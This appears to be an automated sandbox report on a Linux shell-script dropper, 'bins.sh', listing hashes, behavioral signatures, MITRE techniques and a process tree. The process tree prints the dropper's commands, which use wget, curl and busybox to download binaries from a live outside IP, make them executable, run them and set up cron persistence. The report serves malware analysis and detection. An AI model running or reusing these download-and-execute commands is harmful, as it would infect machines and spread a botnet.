Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 17:37
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
9bba4ee40fc1f939fff061054cf330df
-
SHA1
f27d57c589ca7606dde15a500b6289240182abd1
-
SHA256
8aeecbca04728d12f9a2c6fc99c020f6a2a452d8818725dbcada6bc8610c85dd
-
SHA512
a58ef1fcfd72e938d3137363918dde300be1813e9ef4e9856f3bf7fb9f92590081a19bf35cd0e40952db1f607e63da93f211da11d533af8d05274007f423dee3
-
SSDEEP
192:ogNwwwYwWw1wBwRVwpAiwwwYwWw1wBwIp:ogNwwwYwWw1wBwRVwaiwwwYwWw1wBww
Malware Config
Signatures
-
Contacts a large (2134) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodpid process 701 chmod 740 chmod -
Executes dropped EXE 2 IoCs
Processes:
OfZeLov89tJZDz5lr6ihWtsp2Idr9WowlwaFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0ioc pid process /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw 703 OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw /tmp/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 741 aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 -
Renames itself 1 IoCs
Processes:
aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0pid process 742 aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.kBRtTX crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0description ioc process File opened for reading /proc/140/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/760/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/786/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1050/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/303/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/809/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/823/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/953/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/992/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/7/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/306/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/830/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/860/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/914/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/942/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/973/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1004/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1047/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/672/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/777/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/784/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/936/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/943/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1058/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/141/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/782/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1016/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/4/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/667/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/763/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/813/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/836/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/854/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/899/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/28/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/771/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/900/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/906/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/935/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/816/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/941/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1017/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1026/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1063/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/798/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/829/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/872/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/907/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1054/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1062/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/332/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/757/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/803/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/808/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/841/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/940/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/301/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/959/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1009/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/1037/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/27/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/821/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/839/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 File opened for reading /proc/908/cmdline aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxwgetcurlbusyboxdescription ioc process File opened for modification /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw wget File opened for modification /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw curl File opened for modification /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw busybox File opened for modification /tmp/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 wget File opened for modification /tmp/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 curl File opened for modification /tmp/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:669
-
/bin/rm/bin/rm bins.sh2⤵PID:671
-
/usr/bin/wgetwget http://216.126.231.240/bins/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- Writes file to tmp directory
PID:677 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:697 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- Writes file to tmp directory
PID:700 -
/bin/chmodchmod 777 OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- File and Directory Permissions Modification
PID:701 -
/tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw./OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- Executes dropped EXE
PID:703 -
/bin/rmrm OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵PID:706
-
/usr/bin/wgetwget http://216.126.231.240/bins/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s02⤵
- Writes file to tmp directory
PID:707 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s02⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:720 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s02⤵
- Writes file to tmp directory
PID:733 -
/bin/chmodchmod 777 aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s02⤵
- File and Directory Permissions Modification
PID:740 -
/tmp/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0./aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s02⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:741 -
/bin/shsh -c "crontab -l"3⤵PID:743
-
/usr/bin/crontabcrontab -l4⤵PID:744
-
/bin/shsh -c "crontab -"3⤵PID:746
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:748 -
/bin/rmrm aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s02⤵PID:761
-
/usr/bin/wgetwget http://216.126.231.240/bins/pBG1nyPKdOXBDnNPF5qsAKiE9y1eQ3fQuB2⤵PID:764
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD5787ba35e292ffefc3471d8589382cd46
SHA18f43c4a7807248fa58f6bc397155a3c47e8d7b8f
SHA25676901c4022f41e03eab55abd11a2dab58fd92c4a29e280b71ae7991a0b3dbf3b
SHA51211baafe686b8da4402f72664b51f7766a318fb1228f765babd3254bc97919cf23adf9da3f9d28b43b074a5fa7849bbe0ac6dfb29dc66cdb55328f19739430d0b